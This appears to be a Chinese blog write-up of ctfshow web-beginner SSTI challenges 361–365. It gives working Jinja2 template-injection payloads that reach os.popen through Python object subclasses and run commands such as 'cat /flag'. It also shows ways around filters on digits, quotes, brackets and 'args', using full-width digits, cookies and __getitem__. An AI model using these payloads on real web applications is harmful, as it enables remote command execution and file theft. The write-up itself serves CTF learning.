ctfshow web入门 SSTI

361

提示“名字就是考点”

传参点name

  1. 获取字符串的类

    "".__class__

    得到str的类对象。

  2. 获取基类

    "".__class__.__bases__[0]

    这会得到str类的基类列表,其中第一个元素是object类。

  3. 获取object类的所有子类

    "".__class__.__bases__[0].__subclasses__()

    返回一个包含Python中所有类的列表,这些类都是直接或间接从object继承的。

  4. 选择特定的子类

    "".__class__.__bases__[0].__subclasses__()[132]

    选择了列表中的第133个元素(因为索引是从0开始的)。

  5. 访问Popen类的初始化方法的全局变量

    "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__

    通过访问Popen类的__init__方法的__globals__属性,可以获得一个字典,其中包含Popen类定义时可用的所有全局变量。

  6. 调用popen

    "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']

    从全局变量字典中获取名为popen的变量

  7. 执行系统命令

    "".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag')

    使用Popen类来执行cat /flag命令,这个命令通常用于读取名为flag的文件。

  8. 读取命令输出

    调用read()方法来读取Popen对象的输出,即cat /flag命令的输出。

payload

"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()

362

传参试试

轮流试试每个数字,发现只有2和3被过滤

而且只要字符串不包括2和3就能显示

使用全角数字进行绕过

关闭使用半角输入模式

“1234567890”

payload:

?name={{"".__class__.__bases__[0].__subclasses__()[132].__init__.__globals__['popen']('cat /flag').read()}}

363

 

数字没有被过滤掉

经过各种字母和符号尝试,发现会过滤“”

试试把“”进行url编码看看

还是会被过滤

但是传参会自动补齐双引号,所以索性不加了

?name={{x.__init__.__globals__[request.args.a].eval(request.args.b)}}&a=__builtins__&b=__import__('os').popen('cat /flag').read()

 364

它将arg过滤掉了,所以没有办法直接GET传参

改用Cookie传

GET传参

?name={{x.__init__.__globals__[request.cookies.x1].eval(request.cookies.x2)}}

Cookie:

x1=__builtins__;x2=__import__('os').popen('cat /flag').read()

365

尝试Jinja2模板注入

过滤单双引号、[、args

找一下os

{{x.__class__.__bases__.__getitem__(0).__subclasses__()}}

 在页面内查找

数出来是132

用__getitem__绕过中括号[过滤,request对象绕过引号''""过滤,cookie或者values绕过args过滤

得到:

{{x.__class__.__bases__.__getitem__(0).__subclasses__().__getitem__(132).__init__.__globals__.popen(request.cookies.x).read()}}

还有Cookie传参

x=ls /

再传

Cookie:x=tac /f*

 

 

  • 4
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值